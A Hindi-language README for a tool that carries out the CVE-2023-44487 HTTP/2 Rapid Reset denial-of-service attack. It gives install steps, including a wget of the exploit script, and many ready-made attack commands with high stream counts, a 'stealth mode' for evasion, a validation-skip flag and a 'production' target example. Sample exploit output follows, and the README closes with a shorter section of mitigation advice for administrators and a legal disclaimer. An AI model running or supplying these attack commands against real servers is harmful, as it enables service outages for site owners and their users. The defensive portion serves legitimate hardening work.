CVE-2023-44487 HTTP/2 DoS रैपिड रीसेट एक्सप्लॉइट
प्रोफेशनल एडिशन v1.0.1 | लेखक: सुदीपा वानिगरत्न
-orange.svg)
विषय-सूची
अवलोकन
CVE-2023-44487, यानी HTTP/2 रैपिड रीसेट भेद्यता के लिए एक प्रोफेशनल-ग्रेड मूल्यांकन फ्रेमवर्क। यह टूल सुरक्षा पेशेवरों को हाल के वर्षों में खुलासा किए गए सबसे प्रभावशाली HTTP/2 DoS स्थितियों में से एक के विरुद्ध सिस्टम का परीक्षण और सत्यापन करने में मदद करता है।
यह प्रदर्शित करता है कि कैसे HTTP/2 स्ट्रीम को तेज़ी से बनाना और रीसेट करना सर्वर संसाधनों को समाप्त कर सकता है और डिनायल ऑफ सर्विस (DoS) स्थितियों को जन्म दे सकता है।
एक नज़र में मुख्य विशेषताएँ
- मल्टी-कनेक्शन अटैक इंजन — समवर्ती HTTP/2 कनेक्शन
- अनुकूली दर नियंत्रण — अधिकतम प्रभावशीलता के लिए गतिशील समायोजन
- स्टील्थ मोड — यादृच्छिक हेडर और कनेक्शन रोटेशन
- व्यापक रिपोर्टिंग — जोखिम मूल्यांकन के साथ JSON/CSV
- Docker समर्थन — कंटेनरीकृत डिप्लॉयमेंट
- रीयल-टाइम मॉनिटरिंग — लाइव अटैक मेट्रिक्स और प्रगति
- प्रोफेशनल लॉगिंग — फ़ाइल लॉगिंग के साथ रंगीन कंसोल आउटपुट
| उपयोग | परिणाम |
|---|
 |  |
भेद्यता विवरण
CVE-2023-44487: HTTP/2 रैपिड रीसेट अटैक
तकनीकी अवलोकन
यह भेद्यता HTTP/2 प्रोटोकॉल के स्ट्रीम प्रबंधन तंत्र का शोषण करती है:
- स्ट्रीम निर्माण — क्लाइंट नई स्ट्रीम बनाने के लिए HEADERS फ्रेम भेजता है
- तत्काल रीसेट — क्लाइंट तुरंत RST_STREAM फ्रेम भेजता है
- सर्वर प्रोसेसिंग — सर्वर को दोनों फ्रेम प्रोसेस करने पड़ते हैं, जिससे संसाधनों की खपत होती है
- संसाधन क्षरण — बार-बार चक्र सर्वर संसाधनों को अभिभूत कर देते हैं
प्रभाव
- HTTP/2 सर्वर पर संसाधन क्षरण
- संभावित डिनायल ऑफ सर्विस (DoS)
- लोड बैलेंसर, प्रॉक्सी और CDN को प्रभावित कर सकता है
- किसी प्रमाणीकरण या विशेष विशेषाधिकार की आवश्यकता नहीं
विशेषताएँ
मुख्य विशेषताएँ
उन्नत क्षमताएँ
- प्रॉक्सी समर्थन — एक्स्टेंसिबल प्रॉक्सी कॉन्फ़िगरेशन
- कनेक्शन पूलिंग — कुशल कनेक्शन प्रबंधन
- त्रुटि पुनर्प्राप्ति — कनेक्शन विफलताओं का सुगम संचालन
- प्रदर्शन ट्यूनिंग — विभिन्न परिदृश्यों के लिए कॉन्फ़िगर करने योग्य सेटिंग्स
- CI/CD एकीकरण — स्वचालित सुरक्षा परीक्षण के लिए उपयुक्त
आवश्यकताएँ
सिस्टम आवश्यकताएँ
निर्भरताएँ
h2>=4.1.0,<5.0.0
aiohttp>=3.8.0,<4.0.0
इंस्टॉलेशन
1. त्वरित इंस्टॉल
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
# Install dependencies
pip install -r requirements.txt
# Verify installation
python3 cve-2023-44487-exploit.py --help
2. वर्चुअल एनवायरनमेंट (अनुशंसित)
# Create virtual environment
python3 -m venv venv
# Activate virtual environment
# On Linux/macOS:
source venv/bin/activate
# On Windows:
venv\Scripts\activate
# Install dependencies
pip install -r requirements.txt
3. Docker इंस्टॉलेशन
# Build Docker image
docker build -t cve-2023-44487-exploit .
# Run with Docker
docker run --rm cve-2023-44487-exploit target.com
4. मैनुअल इंस्टॉलेशन
# Install without requirements.txt
pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"
# Download the exploit
wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py
# Make executable
chmod +x cve-2023-44487-exploit.py
त्वरित आरंभ
बुनियादी उपयोग
# Simple run with default settings
python3 cve-2023-44487-exploit.py example.com
# Test HTTPS on port 443
python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify
# Test HTTP on port 80
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
त्वरित परीक्षण (5 सेकंड)
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
पूर्ण मूल्यांकन (60 सेकंड)
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify
उपयोग गाइड
कमांड लाइन विकल्प
लक्ष्य कॉन्फ़िगरेशन
अटैक कॉन्फ़िगरेशन
उन्नत विकल्प
रिपोर्टिंग
कॉन्फ़िगरेशन विकल्प
ऊपर दिए गए CLI फ़्लैग का उपयोग करके कॉनकरंसी, स्ट्रीम वॉल्यूम, अवधि और रिपोर्टिंग को ट्यून करें। प्रारंभिक सत्यापन के लिए कम -c / -s / -d मान पसंद करें, और फिर केवल उन्हीं सिस्टम पर स्केल करें जिनका स्ट्रेस-टेस्ट करने के लिए आप अधिकृत हैं।
Docker समर्थन
इमेज बनाएं
docker build -t cve-2023-44487-exploit .
बुनियादी मूल्यांकन चलाएं
docker run --rm cve-2023-44487-exploit target.com
कस्टम पैरामीटर के साथ चलाएं
docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60
परिणाम स्थानीय रूप से सहेजें
docker run --rm -v "$(pwd)/results:/app/results" \
cve-2023-44487-exploit target.com -o /app/results/report.json
इंटरैक्टिव मोड
docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit
Docker Compose
# Start with docker-compose
docker-compose up
# Run with a custom command
docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60
उदाहरण
1. बुनियादी HTTPS मूल्यांकन
python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30
2. HTTP मूल्यांकन (SSL के बिना)
python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30
3. उच्च-प्रदर्शन लैब रन
python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000
4. स्टील्थ मोड
python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60
5. त्वरित सत्यापन परीक्षण
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
6. CSV रिपोर्ट बनाएं
python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv
7. सत्यापन छोड़ें
python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30
8. अधिकृत प्रोडक्शन परीक्षण
python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
-c 100 -s 2000 -d 60 --stealth -o full_report.json
परिणामों को समझना
आउटपुट मेट्रिक्स
जोखिम मूल्यांकन स्तर
नमूना आउटपुट
================================================================================
EXPLOIT EXECUTION SUMMARY
================================================================================
Target: target.com:443
Duration: 30.00s
Total Streams: 15,234
Successful Resets: 15,198
Reset Rate: 506.6/s
Success Rate: 99.76%
Connection Errors: 0
--------------------------------------------------------------------------------
RISK ASSESSMENT
--------------------------------------------------------------------------------
Risk Level: CRITICAL
Risk Score: 95/100
Factors:
- Extremely high reset rate accepted
- Very high success rate
================================================================================
सुरक्षा अनुशंसाएँ
सिस्टम प्रशासकों के लिए
तत्काल कार्रवाई
-
सुरक्षा पैच लागू करें
- नवीनतम HTTP/2 कार्यान्वयन में अपडेट करें
- विक्रेता-विशिष्ट सुरक्षा पैच लागू करें
- लोड बैलेंसर और प्रॉक्सी अपडेट करें
-
रेट लिमिटिंग लागू करें
# Nginx rate limiting example
http {
limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
limit_req zone=http2 burst=20 nodelay;
}
-
कनेक्शन सीमाएँ
# Limit connections per client
limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
limit_conn conn_zone 10;
कॉन्फ़िगरेशन हार्डनिंग
| सेटिंग | अनुशंसा |
|---|
| अधिकतम समवर्ती स्ट्रीम | प्रति कनेक्शन 100–200 सेट करें |
| स्ट्रीम रीसेट दर | प्रति क्लाइंट <100/सेकंड तक सीमित करें |
निगरानी
# Monitor HTTP/2 connections
netstat -an | grep 443 | grep ESTABLISHED | wc -l
# Monitor reset-related log entries (example)
grep "RST_STREAM" /var/log/nginx/error.log | wc -l
अनुशंसित सुरक्षा नियंत्रण
कानूनी अस्वीकरण
महत्वपूर्ण: इस टूल का उपयोग करने से पहले इसे ध्यान से पढ़ें
यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
उपयोग की शर्तें
इस टूल का उपयोग करके, आप स्वीकार करते हैं और सहमत होते हैं कि:
- आपके पास लक्ष्य प्रणाली का परीक्षण करने के लिए स्पष्ट लिखित अनुमति है
- आप इस मूल्यांकन के जोखिमों और संभावित प्रभाव को समझते हैं
- आप सभी लागू कानूनों और विनियमों का पालन करेंगे
- आप अपने कार्यों की पूरी जिम्मेदारी स्वीकार करते हैं
- आप इस टूल का उपयोग अनधिकृत गतिविधियों के लिए नहीं करेंगे
निषिद्ध उपयोग
इस टूल का उपयोग इनके लिए नहीं किया जाना चाहिए:
- अनधिकृत परीक्षण या हमले
- उन प्रणालियों के विरुद्ध डिनायल ऑफ सर्विस जिनके आप स्वामी नहीं हैं या परीक्षण की अनुमति नहीं है
- प्राधिकरण के बिना प्रोडक्शन प्रणालियों को बाधित करना
- वित्तीय क्षति पहुँचाना
- कोई भी अवैध गतिविधि
दायित्व वक्तव्य
लेखक और योगदानकर्ता इस टूल को बिना किसी वारंटी के "जैसा है" (AS IS) प्रदान करते हैं। इस टूल का उपयोग आपके अपने जोखिम पर है। इस टूल के उपयोग से उत्पन्न किसी भी क्षति या कानूनी समस्या के लिए लेखक जिम्मेदार नहीं है।
इस टूल का अनधिकृत उपयोग निम्नलिखित कानूनों का उल्लंघन कर सकता है, जिनमें ये शामिल हैं, लेकिन इन्हीं तक सीमित नहीं:
- कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA) — USA
- कंप्यूटर मिसयूज़ एक्ट — UK
- जनरल डेटा प्रोटेक्शन रेगुलेशन (GDPR) — EU
- अन्य प्रासंगिक स्थानीय, राष्ट्रीय और अंतर्राष्ट्रीय कानून
लेखक
सुदीपा वानिगरत्न
- सुरक्षा शोधकर्ता और पेनेट्रेशन टेस्टर
- एप्लिकेशन सुरक्षा और प्रोटोकॉल भेद्यता में विशेषज्ञता
- GitHub
- LinkedIn
परिवर्तन लॉग
संस्करण 1.0.1 (वर्तमान)
connection_attempts एट्रिब्यूट त्रुटि ठीक की गई
- SSL/ALPN सत्यापन में सुधार किया गया
- टाइमआउट हैंडलिंग जोड़ी गई
- बेहतर त्रुटि पुनर्प्राप्ति
--skip-validation फ़्लैग जोड़ा गया
- Docker समर्थन में सुधार किया गया
संस्करण 1.0.0 (प्रारंभिक)
- प्रोफेशनल एडिशन का प्रारंभिक रिलीज़
- मल्टी-कनेक्शन अटैक इंजन
- अनुकूली दर नियंत्रण
- स्टील्थ मोड
- व्यापक रिपोर्टिंग
- Docker समर्थन
लाइसेंस
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है — विवरण के लिए LICENSE फ़ाइल देखें।
आभार
- HTTP/2 प्रोटोकॉल टीम
- सुरक्षा शोधकर्ता जिन्होंने CVE-2023-44487 की पहचान की
- ओपन सोर्स समुदाय (
h2, aiohttp प्रोजेक्ट)
संदर्भ
सहायता
समस्याओं और प्रश्नों के लिए:
त्वरित संदर्भ कार्ड
# Quick Commands
# Test HTTPS (skip cert verify)
python3 cve-2023-44487-exploit.py target.com --no-verify
# Test HTTP
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
# Quick test (5 seconds)
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5
# Full assessment
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth
# Skip validation
python3 cve-2023-44487-exploit.py target.com --skip-validation
# Docker
docker run --rm cve-2023-44487-exploit target.com
# Help
python3 cve-2023-44487-exploit.py --help
अनुस्मारक: किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। इस टूल का उपयोग जिम्मेदारीपूर्वक और नैतिक रूप से करें।
रखरखाव: सुदीपा वानिगरत्न | अंतिम अपडेट: अगस्त 2026